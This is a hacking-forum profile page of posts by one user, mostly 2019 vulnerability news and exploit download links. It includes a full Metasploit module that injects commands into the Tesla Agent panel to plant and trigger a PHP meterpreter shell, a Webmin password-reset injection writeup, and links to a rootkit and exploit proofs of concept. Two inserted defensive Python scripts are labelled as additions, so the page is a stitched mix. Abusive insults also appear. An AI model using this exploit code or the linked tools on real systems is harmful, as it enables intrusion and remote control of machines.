
BiosHell

Active Members
  • Content Count: 326
  • Days Won: 17

Everything posted by BiosHell

  1. Today’s exploit of the day is one affecting the popular system administrator tool Webmin that is known to run on port 10000. A bug has been found in the reset password function that allows a malicious third party to execute malicious code due to lack of input validation.

     Affecting: Webmin instances up to the latest version 1.920 which have the setting “user password change enabled”.

     The vulnerability has been given the CVE ID CVE-2019-15107; at the time of writing this (2019-08-16) the vulnerability still exists in the latest version you can download from Webmin’s official site.

     Vulnerable code in version 1.920:

     computer@box:/tmp/webmin-1.920$ cat -n password_change.cgi | head -n 176 | tail -29
        148
        149  # Read shadow file and find user
        150  &lock_file($miniserv{'passwd_file'});
        151  $lref = &read_file_lines($miniserv{'passwd_file'});
        152  for($i=0; $i<@$lref; $i++) {
        153      @line = split(/:/, $lref->[$i], -1);
        154      local $u = $line[$miniserv{'passwd_uindex'}];
        155      if ($u eq $in{'user'}) {
        156          $idx = $i;
        157          last;
        158          }
        159      }
        160  defined($idx) || &pass_error($text{'password_euser'});
        161
        162  # Validate old password
        163  &unix_crypt($in{'old'}, $line[$miniserv{'passwd_pindex'}]) eq
        164      $line[$miniserv{'passwd_pindex'}] ||
        165      &pass_error($text{'password_eold'});
        166
        167  # Make sure new password meets restrictions
        168  if (&foreign_check("changepass")) {
        169      &foreign_require("changepass", "changepass-lib.pl");
        170      $err = &changepass::check_password($in{'new1'}, $in{'user'});
        171      &pass_error($err) if ($err);
        172      }
        173  elsif (&foreign_check("useradmin")) {
        174      &foreign_require("useradmin", "user-lib.pl");
        175      $err = &useradmin::check_password_restrictions(
        176          $in{'new1'}, $in{'user'});

     Proof of concept

     The vulnerability lies in the &unix_crypt function that checks the password against the system’s /etc/shadow file. By adding a simple pipe command (“|”) the author is able to exploit this to execute whatever code he wants. The pipe command is like saying “and”, in the sense of “execute this command and this one”; here the author proves that this is very easily exploitable with just a simple POST request.

     Webmin has not had a public statement or patch announced yet, meaning everyone who is running Webmin is running a vulnerable version and should take it offline until further notice. It is still very unclear how many instances of Webmin are public on the internet; a quick search on Shodan finds a bit over 13 0000.

     External links: Webmin on Wikipedia, Webmin in nmap, Author’s blog post, Archived link of the author’s blog post, NIST CVE, Shodan

     Stay up to date with Vulnerability Management and build cool things with our API. This blog post is part of the exploit of the day series where we write a shorter description about interesting exploits that we index.

     Reference Link : https://blog.firosolutions.com/exploits/webmin/?fbclid=IwAR06hKE7owE6af5dXmBaN-o5wioKPeY609QQkXaRwEHRxBMfoCUDaNHq7FY
     Download Link : https://www.exploit-db.com/exploits/47230
     Download Link 2 : https://www.exploit-db.com/exploits/47293
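Added example for the post above (it is not part of the original post, the quoted blog, or Webmin itself): a small parser over constructed miniserv.log lines that flags POST requests to password_change.cgi coming from clients that never authenticated, since the endpoint being reachable before login is what the bug depends on. It assumes miniserv.log uses the Common Log Format layout (client, ident, user, timestamp, request line, status, size); the sample lines are constructed for illustration.

```python
"""Flag pre-authentication POSTs to Webmin's password_change.cgi in miniserv.log.

Added example, not part of the original post or of Webmin. It assumes that
miniserv.log is written in Common Log Format (client, ident, user, timestamp,
request line, status, size); the log lines below are constructed, not real traffic.
"""
import re
from collections import Counter

# Constructed sample of miniserv.log lines (placeholder addresses, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - root [16/Aug/2019:09:58:01 +0000] "GET /index.cgi HTTP/1.1" 200 5120
203.0.113.9 - - [16/Aug/2019:10:01:17 +0000] "POST /password_change.cgi HTTP/1.1" 200 1890
203.0.113.9 - - [16/Aug/2019:10:01:19 +0000] "POST /password_change.cgi HTTP/1.1" 200 1890
198.51.100.4 - - [16/Aug/2019:10:03:40 +0000] "GET /session_login.cgi HTTP/1.1" 200 3312
203.0.113.9 - - [16/Aug/2019:10:04:02 +0000] "POST /password_change.cgi HTTP/1.1" 500 0
10.0.0.5 - root [16/Aug/2019:10:05:55 +0000] "POST /password_change.cgi HTTP/1.1" 302 0
"""

# Common Log Format: client ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_password_change_attempts(log_text):
    """Return entries for POSTs to /password_change.cgi.

    Entries whose user field is '-' never logged in, i.e. the request reached
    the endpoint before authentication, which is the path the bug above needs.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path.endswith("/password_change.cgi"):
            rec["unauthenticated"] = rec["user"] == "-"
            hits.append(rec)
    return hits


def summarize(hits):
    """Count unauthenticated attempts per client address."""
    return Counter(h["client"] for h in hits if h["unauthenticated"])


if __name__ == "__main__":
    hits = find_password_change_attempts(SAMPLE_LOG)
    for h in hits:
        flag = "UNAUTH" if h["unauthenticated"] else "auth  "
        print(f"{flag} {h['client']:15} {h['ts']} {h['status']}")
    print("unauthenticated POSTs per client:", dict(summarize(hits)))
```

An authenticated user changing their own password will also show up here, so the unauthenticated flag, not the endpoint alone, is what should drive an alert; repeated hits from one address with mixed 200/500 responses are the pattern worth looking at first.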
  2. class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::Remote::HttpClient

       def initialize(info={})
         super(update_info(info,
           'Name'           => "Tesla Agent Remote Code Execution",
           'Description'    => %q{
             This module exploits the command injection vulnerability of tesla agent botnet panel.
           },
           'License'        => MSF_LICENSE,
           'Author'         =>
             [
               'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
             ],
           'References'     =>
             [
               ['URL', 'https://prodaft.com']
             ],
           'DefaultOptions' =>
             {
               'SSL' => false,
               'WfsDelay' => 5,
             },
           'Platform'       => ['php'],
           'Arch'           => [ ARCH_PHP ],
           'Targets'        =>
             [
               ['PHP payload',
                 {
                   'Platform' => 'PHP',
                   'Arch' => ARCH_PHP,
                   'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
                 }
               ]
             ],
           'Privileged'     => false,
           'DisclosureDate' => "July 10 2018",
           'DefaultTarget'  => 0
         ))

         register_options(
           [
             OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
           ]
         )
       end

       def check
         res = send_request_cgi(
           'method' => 'GET',
           'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'),
         )
         #print_status(res.body)
         if res && res.body.include?('SQLSTATE')
           Exploit::CheckCode::Appears
         else
           Exploit::CheckCode::Safe
         end
       end

       def exploit
         check
         name = '.'+Rex::Text.rand_text_alpha(4)+'.php'
         res = send_request_cgi(
           'method' => 'GET',
           'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'),
           'encode_params' => true,
           'vars_get' => {
             'table' => 'passwords',
             'primary' => 'password_id',
             'clmns' => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
             'where' => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"")
           }
         )

         if res && res.code == 200 && res.body.include?('recordsTotal')
           print_good("Payload uploaded as #{name}")
         else
           print_error('Payload upload failed :(')
           Msf::Exploit::Failed
         end

         res = send_request_cgi({
           'method' => 'GET',
           'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5
         )

         if res && res.code == 200
           print_good("Payload successfully triggered !")
         else
           print_error('Payload trigger failed :(')
           Msf::Exploit::Failed
         end
       end
     end

     Download Link https://www.exploit-db.com/exploits/47256
  3. BiosHell

    butthax

    the real "penetration testing"
  4. BiosHell

    Fun stuff

    https://i.imgur.com/FmDymVR.jpg
  5. BiosHell

    Good day

    If retards stop signing up here, the forum dies completely
  6. A Google security researcher has just disclosed details of a 20-year-old unpatched high-severity vulnerability affecting all versions of Microsoft Windows, back from Windows XP to the latest Windows 10. The vulnerability resides in the way MSCTF clients and server communicate with each other, allowing even a low privileged or a sandboxed application to read and write data to a higher privileged application. MSCTF is a module in Text Services Framework (TSF) of the Windows operating system that manages things like input methods, keyboard layouts, text processing, and speech recognition. In a nutshell, when you log in to your Windows machine, it starts a CTF monitor service that works as a central authority to handle communications between all clients, which are actually windows for each process running on the same session. POC Link : https://github.com/taviso/ctftool Reference Link : https://thehackernews.com/2019/08/ctfmon-windows-vulnerabilities.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&utm_content=FaceBook&fbclid=IwAR2P3wJ-iWLStzuyUoAnsIWVDojE7P-kyUJnnrX0tnOAN-c1DU7KGbDAGGM
  7. You're both dumb and not even able to search Google, which is a benefit for people like you. Tomorrow a post shows up... looking for a VPS for scanning... or a scanning VPS. As the guys suggested above... pick up a book and read it
  8. Discovered by Microsoft's security team itself, all four vulnerabilities, CVE-2019-1181, CVE-2019-1182, CVE-2019-1222, and CVE-2019-1226, can be exploited by unauthenticated, remote attackers to take control of an affected computer system without requiring any user interaction. Just like the BlueKeep RDP flaw, all four newly discovered vulnerabilities are also wormable and could be exploited by potential malware to propagate itself from one vulnerable computer to another automatically. Reference Link : https://thehackernews.com/2019/08/windows-rdp-wormable-flaws.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+(The+Hackers+News+-+Cyber+Security+Blog)&utm_content=FaceBook&fbclid=IwAR0gMT730nUergbtGRe7cdnTMT4KFVGAfc9hrxwr5oiRSTen8Vi3Amxm84I
  9. The below versions of FortiOS were vulnerable:
     FortiOS 5.6.3 to 5.6.7
     FortiOS 6.0.0 to 6.0.4
     ONLY if the SSL VPN service (web-mode or tunnel-mode) is enabled.
     Download Link: https://github.com/milo2012/CVE-2018-13379?fbclid=IwAR3KlBz15aRQkNYGSHVproriKQPXBFB9fBPnSjkMurySlbnSvvqBB1dV7pI
  10. SpaceCow - Python Rootkit. Follow me on Twitter. In the past days I spent a lot of time watching some RedTeam ops and I saw all these little tools making some awesome stuff... and in 90% of the cases RedTeams don't share their tricks and software with others. So I thought I could create something open source. And after some days I crawled up with something... This script is for testing only. You are fully responsible for what you do. Download Link : https://github.com/TheSph1nx/SpaceCow?fbclid=IwAR0jCSepxcqcCNKv4gvhoxnVANO3YqndmuhX006-VKw1tunk2BINnF1DJQw
  11. The one you know is a PoC for DoS, that old one... here we're talking about RCE
  12. Ransomware has become a major threat to computer systems in recent years, as high-profile attacks have locked users out of personal computers, hospitals, city governments, and even The Weather Channel. Now, security researchers have discovered another device that might be at risk: a DSLR camera. Check Point Software Technologies issued a report today that detailed how its security researchers were able to remotely install malware on a digital DSLR camera. In it, researcher Eyal Itkin found that a hacker can easily plant malware on a digital camera. He says that the standardized Picture Transfer Protocol is an ideal method for delivering malware: it’s unauthenticated and can be used with both Wi-Fi and USB. The report notes that an individual with an infected Wi-Fi access point could deploy it at a tourist destination to pull off an attack, or infect a user’s PC. Reference Link : https://www.blackhatethicalhacking.com/dslr-cameras-vulnerable-to-ransomware-attack/
  13. Download Link : https://ufile.io/3f6m4lwf Available for 30 days !
  14. i see what you did there
  15. How To Scan Vulnerabilities With Nmap NSE? Nmap is a very popular and powerful network-scanning tool, used by all the hackers, script kiddies, pentesters and security researchers in this world. Nmap is compatible with Windows, BSD, Mac OS X and Linux. Scan vulnerabilities with vulscan: vulscan is an Nmap module which turns Nmap into a vulnerability scanner. The nmap option -sV enables version detection per service, which is used to determine potential flaws according to the identified product. The data is looked up in an offline version of VulDB. Scan vulnerabilities with nmap-vulners: nmap-vulners is an NSE script using the vulnerability database from Vulners.com to detect vulnerabilities on the target. Reference Link : https://githacktools.blogspot.com/2019/08/how-to-scan-vulnerabilities-with-nmap-nse.html?fbclid=IwAR1VFZn5MOmZGS0kcNUBU1-VkXK0IfRsPbeDIwQYKsXt91xbyTr-LHj0IXk
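Added example for the post above (not part of the original post, of Nmap, or of the nmap-vulners project): a parser that reads the XML report an `nmap -sV --script vulners -oX` scan of your own hosts produces and ranks the findings by CVSS so the highest-scored, exploit-backed items are triaged first. It assumes the vulners script stores each finding as a <table> of <elem> entries keyed "id", "type", "cvss" and "is_exploit" under the port's <script id="vulners"> element; the embedded report is constructed, with placeholder identifiers rather than real findings.

```python
"""Rank nmap-vulners findings from an nmap XML report by CVSS score.

Added example, not from the original post, Nmap or the nmap-vulners project.
Assumption: the vulners NSE script emits, per matched CPE, a <table> whose
child <table> entries carry <elem> values keyed "id", "type", "cvss" and
"is_exploit". The report below is constructed and uses placeholder IDs.
"""
import xml.etree.ElementTree as ET

# Constructed nmap XML report (placeholder host, products and identifiers).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="ExampleSSH" version="1.0"/>
        <script id="vulners" output="...">
          <table key="cpe:/a:example:examplessh:1.0">
            <table>
              <elem key="id">CVE-0000-0001</elem>
              <elem key="type">cve</elem>
              <elem key="cvss">5.0</elem>
              <elem key="is_exploit">false</elem>
            </table>
            <table>
              <elem key="id">EXPLOIT-PLACEHOLDER-1</elem>
              <elem key="type">exploitdb</elem>
              <elem key="cvss">7.5</elem>
              <elem key="is_exploit">true</elem>
            </table>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="ExampleHTTPd" version="2.2"/>
        <script id="vulners" output="...">
          <table key="cpe:/a:example:examplehttpd:2.2">
            <table>
              <elem key="id">CVE-0000-0002</elem>
              <elem key="type">cve</elem>
              <elem key="cvss">9.8</elem>
              <elem key="is_exploit">false</elem>
            </table>
          </table>
        </script>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_vulners(xml_text):
    """Walk every open port's vulners script output and flatten it to dicts."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # vulners only runs against open, fingerprinted ports
            portid = int(port.get("portid"))
            svc = port.find("service")
            product = svc.get("product", "") if svc is not None else ""
            for script in port.findall("script"):
                if script.get("id") != "vulners":
                    continue
                for cpe_table in script.findall("table"):
                    for entry in cpe_table.findall("table"):
                        elems = {e.get("key"): (e.text or "").strip()
                                 for e in entry.findall("elem")}
                        findings.append({
                            "host": addr,
                            "port": portid,
                            "product": product,
                            "cpe": cpe_table.get("key", ""),
                            "id": elems.get("id", ""),
                            "type": elems.get("type", ""),
                            "cvss": float(elems.get("cvss") or 0.0),
                            "is_exploit": elems.get("is_exploit") == "true",
                        })
    return findings


def rank(findings, min_cvss=0.0):
    """Highest CVSS first; entries with a public exploit win ties."""
    kept = [f for f in findings if f["cvss"] >= min_cvss]
    return sorted(kept, key=lambda f: (f["cvss"], f["is_exploit"]), reverse=True)


if __name__ == "__main__":
    for f in rank(parse_vulners(SAMPLE_XML), min_cvss=7.0):
        tag = "EXPLOIT" if f["is_exploit"] else f["type"]
        print(f"{f['cvss']:4.1f} {f['host']}:{f['port']} {f['product']:12} {f['id']} [{tag}]")
```

Because vulners matches on the version banner that -sV reports, a backported fix leaves the banner unchanged and the finding stays in the list; treat the ranking as a patch-verification worklist, not as confirmed exposure.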
  16. PDF Link : https://github.com/blackorbird/APT_REPORT/blob/master/exploit_report/%23bluekeep RDP from patch to remote code execution.pdf
  17. Security Tool Chest. Anticipating and mitigating security threats is critical during software development. This paper is going to detail and investigate security vulnerabilities and mitigation strategies to help software developers build secure applications and prevent operating system leaks. This paper examines common vulnerabilities, and provides relevant mitigation strategies, from several relevant perspectives. This paper hopes to encompass the cyber Kill Chain as part of the five compromise stages, displaying relevant tools, books and strategies at each stage.
      Contents: Reconnaissance, Weaponization, Delivery, Command and Control, Lateral Movement, Establish Foothold, Escalate Privileges, Data Exfiltration, DLL Architecture, References.
      Reference Link : https://github.com/jmscory/Security-Tool-Chest/blob/master/README.md#reconnaissance
  18. I thought we already had a section for you: "The Trash Bin"
  19. I'm curious too to see how it behaves and what bugs it comes out with; I find it hard to believe they'll recover from the damage that quickly, but I'm still keeping my positive attitude